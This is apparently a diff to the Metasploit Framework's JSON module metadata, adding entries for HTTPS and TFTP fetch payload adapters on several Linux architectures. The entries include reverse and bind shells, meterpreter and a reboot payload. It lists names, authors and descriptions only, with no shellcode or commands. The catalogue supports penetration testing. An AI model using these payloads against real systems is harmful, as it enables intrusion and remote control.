+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/reboot": {
+    "name": "HTTPS Fetch, Linux Reboot",
+    "fullname": "payload/cmd/linux/https/mipsle/reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Michael Messner <devnull@s3cur1ty.de>",
+      "rigan - <imrigan@gmail.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\n\n            A very small shellcode for rebooting the system.\n            This payload is sometimes helpful for testing purposes.",
+    "references": [
+      "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/reboot",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/shell/reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/https/mipsle/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "juan vazquez <juan.vazquez@metasploit.com>",
+      "tkmru"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/mipsle/shell",
+    "stager_refname": "linux/mipsle/reverse_tcp"
+  },
+  "payload_cmd/linux/https/mipsle/shell_bind_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/https/mipsle/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "scut",
+      "vaicebine",
+      "Vlatko Kosturjak",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/mipsle/shell_reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/mipsle/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "rigan <imrigan@gmail.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/mipsle.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/mipsle/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/mipsle",
+    "adapted_refname": "linux/mipsle/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an MIPSLE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc",
+    "adapted_refname": "linux/ppc/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64/shell_bind_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/https/ppc64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nListen for a connection and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64",
+    "adapted_refname": "linux/ppc64/shell_bind_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64/shell_find_port": {
+    "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline",
+    "fullname": "payload/cmd/linux/https/ppc64/shell_find_port",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nSpawn a shell on an established connection",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64/shell_find_port",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64",
+    "adapted_refname": "linux/ppc64/shell_find_port",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64/shell_reverse_tcp": {
+    "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/https/ppc64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Ramon de C Valle <rcvalle@metasploit.com>"
+    ],
+    "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-12 15:52:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64",
+    "adapted_refname": "linux/ppc64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64le/meterpreter_reverse_http": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64le/meterpreter_reverse_https": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/https/ppc64le/meterpreter_reverse_tcp": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute a PPC64LE payload from an HTTPS server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-19 18:10:55 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/ppc64le",
+    "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp",
+    "staged": false
+  },
  "payload_cmd/linux/https/x64/exec": {
    "name": "HTTPS Fetch, Linux Execute Command",
    "fullname": "payload/cmd/linux/https/x64/exec",
@@ -203545,6 +208296,879 @@
    "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6",
    "staged": false
  },
+  "payload_cmd/linux/tftp/aarch64/meterpreter/reverse_tcp": {
+    "name": "TFTP Fetch, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/meterpreter",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/aarch64/shell/reverse_tcp": {
+    "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager",
+    "fullname": "payload/cmd/linux/tftp/aarch64/shell/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/shell/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/shell/reverse_tcp",
+    "staged": true,
+    "stage_refname": "linux/aarch64/shell",
+    "stager_refname": "linux/aarch64/reverse_tcp"
+  },
+  "payload_cmd/linux/tftp/aarch64/shell_reverse_tcp": {
+    "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre"
+    ],
+    "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/aarch64",
+    "adapted_refname": "linux/aarch64/shell_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armbe/meterpreter_reverse_http": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_http",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armbe/meterpreter_reverse_https": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_https",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armbe/meterpreter_reverse_tcp": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr"
+    ],
+    "description": "Fetch and execute an ARMBE payload from a TFTP server.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armbe",
+    "adapted_refname": "linux/armbe/meterpreter_reverse_tcp",
+    "staged": false
+  },
+  "payload_cmd/linux/tftp/armbe/shell_bind_tcp": {
+    "name": "TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/linux/tftp/armbe/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Spencer McIntyre",
+      "Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
+    ],
+    "description": "Fetch and execute an ARMBE payload from a TFTP server.\nListen for a connection and spawn a command shell",
+    "references": [
+      "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-01-30 13:51:05 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/armbe/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/armbe",
+    "adapted_refname": "linux/armbe/shell_bind_tcp",
+    "staged": false
+  },
